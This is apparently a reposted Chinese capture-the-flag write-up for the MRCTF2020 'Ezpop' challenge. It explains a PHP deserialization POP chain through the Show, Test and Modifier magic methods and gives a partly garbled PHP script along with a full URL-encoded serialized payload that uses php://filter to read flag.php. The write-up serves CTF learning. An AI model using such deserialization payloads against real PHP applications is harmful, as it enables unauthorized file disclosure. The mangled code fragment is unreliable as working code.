其他分享
首页 > 其他分享> > [MRCTF2020]Ezpop反序列化POP链调用

[MRCTF2020]Ezpop反序列化POP链调用

作者:互联网

https://buuoj.cn/challenges#[MRCTF2020]Ezpop

Show类
看到有__toString方法,类被当成字符串时的回应方法
__wakeup方法,unserialize反序列化时优先调用
看Test类
__get()方法,访问不存在的属性或是受限的属性时调用
pop链构造

  1. __wakeup()方法通过preg_match()将$this->source做字符串比较,如果$this->source是Show类,就调用了__toString()方法
  2. __toString()访问了str的source属性,str可以构造成Test类,Test类不存在source属性,就调用了Test类的__get()方法
  3. __get()方法将p作为函数使用,p可以实例化成Modifier类,就调用了Modifier的__invoke()方法
  4. __invoke()方法调用了append()方法,包含$value,如果$value为伪协议,则可以读取flag.php
    构造
source = $file; } } class Test{ public $p; } $a = new Show(); $a->str = new Test(); $a->str->p = new Modifier(); $b = new Show($a); echo urlencode(serialize($b)); O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D 输出结果?pop=O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D

标签:__,22%,3A%,7Bs%,Ezpop,POP,Test,序列化,3A1%
来源: https://www.cnblogs.com/Mang0/p/15463989.html